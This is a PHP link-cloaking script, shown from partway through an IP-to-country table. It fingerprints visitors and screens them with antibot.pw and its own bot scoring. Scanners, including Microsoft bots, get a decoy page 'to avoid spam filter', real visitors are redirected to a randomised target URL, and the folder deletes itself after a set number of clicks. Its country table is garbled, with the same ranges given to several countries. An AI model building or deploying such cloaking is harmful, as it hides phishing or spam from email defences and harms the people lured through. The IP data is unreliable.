[ip2long('58.0.0.0'), ip2long('58.255.255.255'), 'AU', 'Australia'], [ip2long('101.0.0.0'), ip2long('101.255.255.255'), 'AU', 'Australia'], [ip2long('103.0.0.0'), ip2long('103.255.255.255'), 'AU', 'Australia'], [ip2long('110.0.0.0'), ip2long('110.255.255.255'), 'AU', 'Australia'], [ip2long('114.0.0.0'), ip2long('114.255.255.255'), 'AU', 'Australia'], [ip2long('115.0.0.0'), ip2long('115.255.255.255'), 'AU', 'Australia'], [ip2long('118.0.0.0'), ip2long('118.255.255.255'), 'AU', 'Australia'], [ip2long('119.0.0.0'), ip2long('119.255.255.255'), 'AU', 'Australia'], [ip2long('120.0.0.0'), ip2long('121.255.255.255'), 'AU', 'Australia'], [ip2long('122.0.0.0'), ip2long('124.255.255.255'), 'AU', 'Australia'], // New Zealand [ip2long('27.0.0.0'), ip2long('27.255.255.255'), 'NZ', 'New Zealand'], [ip2long('49.0.0.0'), ip2long('49.255.255.255'), 'NZ', 'New Zealand'], [ip2long('58.0.0.0'), ip2long('58.255.255.255'), 'NZ', 'New Zealand'], [ip2long('101.0.0.0'), ip2long('101.255.255.255'), 'NZ', 'New Zealand'], [ip2long('103.0.0.0'), ip2long('103.255.255.255'), 'NZ', 'New Zealand'], [ip2long('110.0.0.0'), ip2long('110.255.255.255'), 'NZ', 'New Zealand'], [ip2long('114.0.0.0'), ip2long('114.255.255.255'), 'NZ', 'New Zealand'], [ip2long('115.0.0.0'), ip2long('115.255.255.255'), 'NZ', 'New Zealand'], [ip2long('118.0.0.0'), ip2long('118.255.255.255'), 'NZ', 'New Zealand'], [ip2long('119.0.0.0'), ip2long('119.255.255.255'), 'NZ', 'New Zealand'], [ip2long('120.0.0.0'), ip2long('121.255.255.255'), 'NZ', 'New Zealand'], [ip2long('122.0.0.0'), ip2long('124.255.255.255'), 'NZ', 'New Zealand'], // === SOUTH AMERICA === // Brazil [ip2long('177.0.0.0'), ip2long('177.255.255.255'), 'BR', 'Brazil'], [ip2long('179.0.0.0'), ip2long('179.255.255.255'), 'BR', 'Brazil'], [ip2long('186.0.0.0'), ip2long('191.255.255.255'), 'BR', 'Brazil'], [ip2long('200.0.0.0'), ip2long('201.255.255.255'), 'BR', 'Brazil'], // Argentina [ip2long('181.0.0.0'), ip2long('181.255.255.255'), 'AR', 'Argentina'], [ip2long('190.0.0.0'), ip2long('190.255.255.255'), 'AR', 'Argentina'], [ip2long('200.0.0.0'), ip2long('201.255.255.255'), 'AR', 'Argentina'], // === AFRICA === // South Africa [ip2long('41.0.0.0'), ip2long('41.255.255.255'), 'ZA', 'South Africa'], [ip2long('102.0.0.0'), ip2long('105.255.255.255'), 'ZA', 'South Africa'], [ip2long('154.0.0.0'), ip2long('156.255.255.255'), 'ZA', 'South Africa'], [ip2long('196.0.0.0'), ip2long('197.255.255.255'), 'ZA', 'South Africa'], // Nigeria [ip2long('41.0.0.0'), ip2long('41.255.255.255'), 'NG', 'Nigeria'], [ip2long('102.0.0.0'), ip2long('105.255.255.255'), 'NG', 'Nigeria'], [ip2long('154.0.0.0'), ip2long('156.255.255.255'), 'NG', 'Nigeria'], [ip2long('196.0.0.0'), ip2long('197.255.255.255'), 'NG', 'Nigeria'], // Egypt [ip2long('41.0.0.0'), ip2long('41.255.255.255'), 'EG', 'Egypt'], [ip2long('102.0.0.0'), ip2long('105.255.255.255'), 'EG', 'Egypt'], [ip2long('154.0.0.0'), ip2long('156.255.255.255'), 'EG', 'Egypt'], [ip2long('196.0.0.0'), ip2long('197.255.255.255'), 'EG', 'Egypt'], // === MIDDLE EAST === // UAE [ip2long('5.0.0.0'), ip2long('5.255.255.255'), 'AE', 'UAE'], [ip2long('31.0.0.0'), ip2long('31.255.255.255'), 'AE', 'UAE'], [ip2long('37.0.0.0'), ip2long('37.255.255.255'), 'AE', 'UAE'], [ip2long('46.0.0.0'), ip2long('46.255.255.255'), 'AE', 'UAE'], [ip2long('78.0.0.0'), ip2long('78.255.255.255'), 'AE', 'UAE'], [ip2long('82.0.0.0'), ip2long('82.255.255.255'), 'AE', 'UAE'], [ip2long('85.0.0.0'), ip2long('85.255.255.255'), 'AE', 'UAE'], // Saudi Arabia [ip2long('5.0.0.0'), ip2long('5.255.255.255'), 'SA', 'Saudi Arabia'], [ip2long('31.0.0.0'), ip2long('31.255.255.255'), 'SA', 'Saudi Arabia'], [ip2long('37.0.0.0'), ip2long('37.255.255.255'), 'SA', 'Saudi Arabia'], [ip2long('46.0.0.0'), ip2long('46.255.255.255'), 'SA', 'Saudi Arabia'], [ip2long('78.0.0.0'), ip2long('78.255.255.255'), 'SA', 'Saudi Arabia'], [ip2long('82.0.0.0'), ip2long('82.255.255.255'), 'SA', 'Saudi Arabia'], [ip2long('85.0.0.0'), ip2long('85.255.255.255'), 'SA', 'Saudi Arabia'], // Turkey [ip2long('2.0.0.0'), ip2long('2.255.255.255'), 'TR', 'Turkey'], [ip2long('5.0.0.0'), ip2long('5.255.255.255'), 'TR', 'Turkey'], [ip2long('31.0.0.0'), ip2long('31.255.255.255'), 'TR', 'Turkey'], [ip2long('37.0.0.0'), ip2long('37.255.255.255'), 'TR', 'Turkey'], [ip2long('46.0.0.0'), ip2long('46.255.255.255'), 'TR', 'Turkey'], [ip2long('78.0.0.0'), ip2long('95.255.255.255'), 'TR', 'Turkey'], [ip2long('176.0.0.0'), ip2long('178.255.255.255'), 'TR', 'Turkey'], ]; // Check IP against ranges foreach ($ranges as $range) { if ($ipLong >= $range[0] && $ipLong <= $range[1]) { return $range[2] . ' - ' . $range[3] . ' [Offline]'; } } // Final fallback return 'Unknown'; } // === Parse User Agent === function parseUserAgent($ua) { $browser = 'Unknown'; $os = 'Unknown'; $device = 'Desktop'; // Detect Device & OS (Mobile/Tablet first, then Desktop) if (preg_match('/Android/i', $ua)) { $os = 'Android'; if (preg_match('/Mobile/i', $ua)) { $device = 'Mobile'; } else { $device = 'Tablet'; } } elseif (preg_match('/iPad/i', $ua)) { $os = 'iOS'; $device = 'Tablet'; } elseif (preg_match('/iPhone|iPod/i', $ua)) { $os = 'iOS'; $device = 'Mobile'; } elseif (preg_match('/Windows Phone/i', $ua)) { $os = 'Windows Phone'; $device = 'Mobile'; } elseif (preg_match('/Windows NT/i', $ua)) { $os = 'Windows'; $device = 'Desktop'; } elseif (preg_match('/Mac OS X/i', $ua)) { $os = 'macOS'; $device = 'Desktop'; } elseif (preg_match('/Linux/i', $ua)) { $os = 'Linux'; $device = 'Desktop'; } // Detect Browser if (preg_match('/Edg\//i', $ua)) { $browser = 'Edge'; } elseif (preg_match('/Chrome/i', $ua) && !preg_match('/Edg/i', $ua)) { $browser = 'Chrome'; } elseif (preg_match('/Safari/i', $ua) && !preg_match('/Chrome/i', $ua)) { $browser = 'Safari'; } elseif (preg_match('/Firefox/i', $ua)) { $browser = 'Firefox'; } elseif (preg_match('/MSIE|Trident/i', $ua)) { $browser = 'IE'; } return ['browser' => $browser, 'os' => $os, 'device' => $device]; } // === Logging === function logAccess($token, $ref, $botDetection, $action) { global $logFile; // Set timezone to Indonesia (WIB) date_default_timezone_set('Asia/Jakarta'); $ip = $_SERVER['REMOTE_ADDR']; $ua = $_SERVER['HTTP_USER_AGENT'] ?? 'unknown'; $uaInfo = parseUserAgent($ua); // Get country (with caching to avoid too many API calls) static $countryCache = []; if (!isset($countryCache[$ip])) { $countryCache[$ip] = getCountryFromIP($ip); } $entry = [ 'timestamp' => date('Y-m-d H:i:s'), 'unix_time' => time(), 'hour' => (int)date('H'), 'day_of_week' => date('l'), 'ip' => $ip, 'country' => $countryCache[$ip], 'ua' => $ua, 'browser' => $uaInfo['browser'], 'os' => $uaInfo['os'], 'device' => $uaInfo['device'], 'token' => $token, 'ref' => $ref, 'bot_score' => $botDetection['score'], 'bot_type' => $botDetection['type'] ?? 'unknown', 'bot_reasons' => implode(', ', $botDetection['reasons']), 'action' => $action ]; file_put_contents($logFile, json_encode($entry) . "\n", FILE_APPEND); } // === Deprecated: Old StopBot Integration (not used anymore) === /* function checkStopBot($ip, $ua, $url) { // This function is deprecated and replaced by checkAntibot() // Kept for reference only } */ // === Antibot.pw Integration === function checkAntibot($ip, $ua, $apikey) { if (empty($apikey)) { return ['block' => false, 'reason' => 'Antibot.pw disabled']; } // kalau localhost, ganti ke IP publik contoh if ($ip === '127.0.0.1' || $ip === '::1') { $ip = '23.200.91.255'; } // kalau nggak ada IP atau UA, anggap bot if (!$ip || empty($ua)) { return ['block' => true, 'reason' => 'Missing IP or UA']; } // Endpoint resmi antibot.pw $endpoint = 'https://antibot.pw/api/v2-blockers'; $query = http_build_query([ 'ip' => $ip, 'apikey' => $apikey, 'ua' => $ua, ]); // Use cURL or file_get_contents if (function_exists('curl_init')) { $ch = curl_init(); curl_setopt_array($ch, [ CURLOPT_URL => $endpoint . '?' . $query, CURLOPT_RETURNTRANSFER => true, CURLOPT_TIMEOUT => 5, ]); $response = curl_exec($ch); curl_close($ch); } else { $response = @file_get_contents($endpoint . '?' . $query); } if ($response === false || $response === null || $response === '') { // API error, fail-open (allow traffic) return ['block' => false, 'reason' => 'Antibot.pw API timeout']; } $json = json_decode($response, true); if (!is_array($json)) { return ['block' => false, 'reason' => 'Antibot.pw API error']; } // Bot detected if (!empty($json['is_bot'])) { return ['block' => true, 'reason' => 'Antibot.pw: Bot detected']; } return ['block' => false, 'reason' => 'Antibot.pw passed']; } // === Main Logic === // Step 1: Validate parameters if (!isValidToken($token) || !isValidRef($ref) || !isValidUtm($utm)) { // Track invalid requests $settings['blocked_bots']++; if (!isset($settings['invalid_requests'])) { $settings['invalid_requests'] = 0; } $settings['invalid_requests']++; // Log the invalid attempt logAccess($token ?? 'none', $ref ?? 'none', ['score' => 100, 'reasons' => ['Invalid parameters'], 'type' => 'invalid'], 'blocked_invalid_params'); file_put_contents($dataFile, json_encode($settings, JSON_UNESCAPED_SLASHES)); http_response_code(404); ?> <!DOCTYPE html> <html><head><title>Page Not Found</title></head> <body><h1>404 Not Found</h1><p>The page you're looking for doesn't exist.</p></body> </html> <?php exit; } // Step 2: Check if verified (passed JS check) if ($settings['enable_js_check'] && empty($verified)) { // Serve JS verification page $expectedVerify = hash('sha256', $token . $ref . $utm . date('Ymd')); ?> <!DOCTYPE html> <html lang="en"> <head> <meta charset="UTF-8"> <meta name="viewport" content="width=device-width, initial-scale=1.0"> <meta name="robots" content="noindex, nofollow"> <title>Please Wait...</title> <style> body { margin: 0; padding: 0; background: white; } </style> </head> <body> <script> const fingerprint = { screen: screen.width + 'x' + screen.height, timezone: new Date().getTimezoneOffset(), language: navigator.language, platform: navigator.platform, hasTouch: 'ontouchstart' in window, timestamp: Date.now() }; const verify = '<?= $expectedVerify ?>'; const url = new URL(window.location.href); url.searchParams.set('_v', verify); url.searchParams.set('_fp', btoa(JSON.stringify(fingerprint))); const delay = <?= $settings['enable_timing_check'] ? '800 + Math.random() * 400' : '300' ?>; setTimeout(() => { window.location.replace(url.toString()); }, delay); </script> </body> </html> <?php exit; } // Step 3: Validate verification if ($settings['enable_js_check']) { $expectedVerify = hash('sha256', $token . $ref . $utm . date('Ymd')); if ($verified !== $expectedVerify) { // Invalid verification - show fake register $settings['blocked_bots']++; logAccess($token, $ref, ['score' => 100, 'reasons' => ['Invalid verification']], 'blocked_invalid_verify'); file_put_contents($dataFile, json_encode($settings, JSON_UNESCAPED_SLASHES)); include __DIR__ . '/decoy-register.html'; exit; } } // === LAYER 1: Antibot.pw Check (if enabled) === if (!empty($settings['enable_antibot'])) { // Check session first to avoid multiple API calls if (!isset($_SESSION['antibot_checked'])) { $_SESSION['antibot_checked'] = true; // Call Antibot.pw API $antibotResult = checkAntibot( $_SERVER['REMOTE_ADDR'] ?? '', $_SERVER['HTTP_USER_AGENT'] ?? '', $settings['antibot_apikey'] ?? '' ); if ($antibotResult['block']) { $_SESSION['antibot_is_bot'] = true; } } // If marked as bot by Antibot.pw if (!empty($_SESSION['antibot_is_bot'])) { $settings['blocked_bots']++; $settings['blocked_bots_antibot']++; logAccess($token, $ref, ['score' => 100, 'reasons' => ['Antibot.pw: Bot detected']], 'blocked_antibot'); file_put_contents($dataFile, json_encode($settings, JSON_UNESCAPED_SLASHES)); // Serve decoy page directly (NO REDIRECT to avoid spam filter) include __DIR__ . '/decoy-register.html'; exit; } } // === LAYER 2: Our Custom Bot Detection === $botDetection = detectBot(); $isBot = $botDetection['score'] >= $settings['bot_threshold']; if ($isBot) { // Bot detected by our system $settings['blocked_bots']++; // Increment specific bot type counter if ($botDetection['type'] === 'microsoft') { $settings['blocked_bots_microsoft']++; } else { $settings['blocked_bots_generic']++; } logAccess($token, $ref, $botDetection, 'blocked_bot_decoy'); file_put_contents($dataFile, json_encode($settings, JSON_UNESCAPED_SLASHES)); // Serve fake register page directly (NO REDIRECT to avoid spam filter) include __DIR__ . '/decoy-register.html'; exit; } // === LAYER 3: Human - Allow Access === $settings['clicks']++; logAccess($token, $ref, $botDetection, 'allowed_human'); file_put_contents($dataFile, json_encode($settings, JSON_UNESCAPED_SLASHES)); // Check if auto-delete is enabled and limit reached if (!empty($settings['auto_delete_enabled']) && $settings['clicks'] >= ($settings['auto_delete_clicks'] ?? 10)) { // Schedule folder deletion after redirect register_shutdown_function(function() { // Wait a bit to ensure redirect completes sleep(2); // Delete current folder recursively $currentDir = __DIR__; $folderName = basename($currentDir); // Only delete if folder name matches pattern (6 alphanumeric) if (preg_match('/^[a-z0-9]{6}$/', $folderName)) { deleteFolder($currentDir); } }); } // Process target URL with placeholders $targetUrl = $settings['target_url']; // Replace placeholders with random values $placeholders = [ '{session}' => bin2hex(random_bytes(16)), '{ref}' => mt_rand(100000, 999999), '{token}' => bin2hex(random_bytes(16)), '{id}' => bin2hex(random_bytes(12)), '{code}' => strtoupper(bin2hex(random_bytes(4))), '{timestamp}' => time(), '{random}' => bin2hex(random_bytes(8)), '{hex32}' => bin2hex(random_bytes(16)), '{hex16}' => bin2hex(random_bytes(8)), '{num6}' => mt_rand(100000, 999999), '{num8}' => mt_rand(10000000, 99999999), '{alphanum}' => substr(str_shuffle('ABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789'), 0, 8) ]; foreach ($placeholders as $placeholder => $value) { $targetUrl = str_replace($placeholder, $value, $targetUrl); } // Redirect to target URL header("Location: " . $targetUrl, true, 302); exit; // Helper function for recursive folder deletion function deleteFolder($dir) { if (!file_exists($dir)) return; if (!is_dir($dir)) return unlink($dir); $files = array_diff(scandir($dir), ['.', '..']); foreach ($files as $file) { $path = $dir . '/' . $file; is_dir($path) ? deleteFolder($path) : unlink($path); } return rmdir($dir); }
Upload File
Create Folder